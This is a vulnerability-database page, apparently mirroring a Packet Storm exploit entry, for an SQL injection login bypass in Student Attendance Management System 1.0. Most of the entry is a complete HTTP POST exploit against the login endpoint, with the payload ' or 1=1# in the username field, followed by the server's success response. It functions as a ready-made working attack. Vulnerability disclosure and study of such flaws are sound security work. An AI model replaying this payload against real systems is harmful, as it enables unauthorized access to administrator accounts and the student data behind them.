Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:179190
HistoryJun 24, 2024 - 12:00 a.m.

Student Attendance Management System 1.0 SQL Injection

2024-06-2400:00:00
nu11secur1ty
packetstormsecurity.com
89

7.4 High

AI Score

Confidence

Low

JSON
`## Titles: Student Attendance Management System-1.0 Bypass Authentication  
SQLi  
## Author: nu11secur1ty  
## Date: 06/22/2024  
## Vendor: https://github.com/oretnom23  
## Software:  
https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The username parameter is not sanitizing well, the attacker can inject  
direct queries into the login form and easily bypass the authentication of  
the admin account.  
  
STATUS: CRITICAL- Vulnerability  
  
  
[+]Exploits:  
- Exploit:  
```POST  
POST /student_attendance/ajax.php?action=login HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4  
Content-Length: 104  
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"  
Accept-Language: en-US  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://pwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://pwnedhost.com/student_attendance/login.php  
Accept-Encoding: gzip, deflate, br  
Priority: u=1, i  
Connection: keep-alive  
  
username=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid  
```  
  
[+]Response  
```HTTP  
HTTP/1.1 200 OK  
Date: Sat, 22 Jun 2024 06:37:41 GMT  
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4  
X-Powered-By: PHP/8.2.4  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html; charset=UTF-8  
  
1  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/student-system-1-106665723)  
  
## Proof and Exploit:  
[href](https://www.patreon.com/posts/student-system-1-106665723)  
  
## Time spent:  
01:25:00  
  
`

7.4 High

AI Score

Confidence

Low

JSON